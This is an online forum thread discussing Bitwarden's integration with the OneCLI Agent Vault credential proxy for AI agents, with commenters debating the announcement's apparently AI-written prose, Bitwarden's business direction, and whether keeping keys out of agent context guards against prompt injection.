Discussion

Bitwarden Integrates with OneCLI Agent Vault

post-it: > Why this matters> Most agent credential setups today work like this: you store your API keys somewhere (env vars, a secrets manager, a password vault), the agent fetches the key, and from that point on the key lives in the agent's context. Extractable. Loggable. Leakable via prompt injection.Jesus if you're going to use AI for press releases at least train it on a sample of your own writing or something instead of always making it sound like a 2010s car commercial.I shouldn't be able to identify AI slop this easily.

rcakebread: Did you mean to post this on April 1st?

e7h4nz: Did you actually read this article or try to understand what OneCLI does?

bundie: I don't get it. Why does a password manager need AI?

AnonC: Tangential: Where is Bitwarden on the below roadmap right now? It wasn’t even good to users, but was an alternative to 1Password and others that had long crossed this bridge.‘Here is how platforms die: first, they are good to their users; then they abuse their users to make things better for their business customers; finally, they abuse those business customers to claw back all the value for themselves. Then, they die. I call this enshittification, and it is a seemingly inevitable consequence arising from the combination of the ease of changing how a platform allocates value, combined with the nature of a "two-sided market", where a platform sits between buyers and sellers, hold each hostage to the other, raking off an ever-larger share of the value that passes between them.’- Cory Doctorow

falcor84: I don't get what semantic value you're getting by pasting this. It's almost like saying "VC-funded tech = bad", which is an ironic stance to take on this platform.Is this anything that bitwarden did that is actually bad for you as a customer of theirs?

brumbelow: Awesome! Now even my bitwarden keys can get stolen through prompt injection. What a time to be alive

aduermael: How so? From what I understand, all requests have to be proxied through OneCLI so that agent can't see your keys.

garettmd: It used to be that people didn't read the article, now they don't even read the headline.

ilitirit: > It wasn’t even good to usersI may be out of the loop, but how was Bitwarden not "good" to users? Does this relate to the recent price increase?

lucideer: I really don't understand the HN comments here.Lots of assumptions that the article is AI-authored (it could be but I'm not seeing overtly obvious signs - it's quite readable) & a lot of ungrounded assumptions that this is somehow related to Bitwarden integrating AI into their product.I really thought reading comprehension among HN users was better than this.

falcor84: Is there anything actually bad with that writing (other than implying that theirs is the first system to solve this)?AI has been rlhf post-trained to generate text that people find to be clear to read. Are you now looking to reject clear writing just to spite AI labs?

antonyt: Pieces of writing don’t really exist in isolation. Your opinion of a given chunk is formed not only by it, but by everything else you have read.So in one part the negative reaction is to staleness. Everything sounds the same.If it was all the same but dry, terse, and to the point (like technical writing), it wouldn’t be so bad.But it’s repetitive with an annoying, breathless, get-ready-to-be-impressed voice that many of us find grating.

rvz: OneCLI does not even have a security audit and a VC backed password manager believes that it is secure enough to integrate in their password manager.I could not be anymore bearish on Bitwarden than before after looking at this and very glad that I don't use them.

JaggedJax: I don't understand why this would change any opinion on Bitwarden. Bitwarden offers an API and OneCLI calls the Bitwarden API. How does a 3rd party calling Bitwarden's API say anything about Bitwarden?

rschiavone: What's wrong with 1Password?

Uvix: They switched from a purchase with local vault storage model (where you could sync it to the cloud if you wanted to) to subscription-only with cloud storage they control.

mrweasel: [delayed]

SkyPuncher: These tools are useful, but I can't help to feel like they're solving the wrong part of the problem. I really don't have much concern that an agent has access to one of my credentials. Outside of production, most of these credentials are going to be limited in privilege and self-rotatable.What remains terrifying is the ability to exfil important data or run commands that are malicious.